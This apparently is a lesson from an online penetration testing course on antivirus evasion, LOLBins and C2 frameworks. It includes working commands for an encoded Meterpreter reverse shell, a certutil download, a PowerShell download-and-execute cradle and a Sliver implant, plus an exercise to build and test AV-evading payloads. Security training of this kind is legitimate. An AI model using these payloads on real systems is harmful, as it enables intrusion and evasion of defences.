HomePenetration Testing in 5 DaysDay 4
Day 4 of 5
⏱ ~60 minutes
Penetration Testing in 5 Days — Day 4

Advanced Tools & Evasion

Modern environments deploy EDR, AV, and network monitoring that detect common attack tools. Today you learn tool customization, payload obfuscation, and living-off-the-land techniques to operate in defended environments.

Antivirus Evasion Techniques

Signature-based AV detects known malware patterns. Bypass techniques: encoding payloads (base64, XOR), using memory-only execution (fileless), obfuscating source code, and using legitimate system binaries (LOLBins). Tools like Veil-Framework, Shellter, and custom Python scripts generate AV-evading payloads. Always test against multiple AV engines.

Living Off the Land (LOLBins)

LOLBins are legitimate Windows/Linux binaries that can be abused for attacker purposes: certutil.exe downloads files, mshta.exe executes scripts, regsvr32.exe loads remote DLLs, rundll32.exe runs arbitrary code. LOLBAS (Windows) and GTFOBins (Linux) catalog all known techniques. EDR solutions now monitor these, but they remain effective against legacy defenses.

C2 Frameworks: Cobalt Strike and Alternatives

Command and Control (C2) frameworks manage post-exploitation sessions across many compromised hosts. Cobalt Strike is the enterprise standard (red teams). Open-source alternatives: Sliver, Havoc, and Covenant. C2 frameworks provide persistence, lateral movement, and exfiltration features unavailable in basic Metasploit sessions.

bash
# Encode a payload with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.50 LPORT=443 \
  -e x64/xor_dynamic -i 10 \
  -f exe -o payload_encoded.exe

# Test detection rate (upload to antiscan.me - no AV reporting)
# Windows LOLBin: certutil download
# certutil.exe -urlcache -f http://192.168.1.50/payload.exe payload.exe

# PowerShell encoded command
$cmd = 'IEX(New-Object Net.WebClient).DownloadString("http://192.168.1.50/shell.ps1")'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
$encoded = [Convert]::ToBase64String($bytes)
powershell -EncodedCommand $encoded

# Sliver C2 server setup
sliver-server
sliver> generate --mtls 192.168.1.50 --os windows --arch amd64 --save implant.exe
💡
Never test AV evasion on VirusTotal — it shares samples with AV vendors and will burn your techniques. Use antiscan.me or an offline test environment.
📝 Day 4 Exercise
Build an AV-Evading Payload
  1. Generate a standard Meterpreter payload and check its AV detection rate on antiscan.me
  2. Apply XOR encoding with 10 iterations and re-test detection rate
  3. Use Shellter to inject a payload into a legitimate PE binary and test again
  4. Set up a Sliver C2 server and generate an mTLS implant
  5. Compare detection rates across all three payload variants

Day 4 Summary

  • AV evasion uses encoding, obfuscation, and memory-only execution
  • LOLBins abuse legitimate system binaries to blend with normal activity
  • C2 frameworks manage multiple compromised hosts from a central server
  • Sliver and Havoc are open-source Cobalt Strike alternatives
  • Test evasion on antiscan.me, never VirusTotal
Challenge

Research and document 5 LOLBins techniques (3 Windows, 2 Linux). For each one, describe the binary, the abuse technique, and the defensive detection method defenders use.

← Previous
Day 3: Network Penetration Testing
Next →
Day 5: Professional Reporting & Career
Finished this lesson?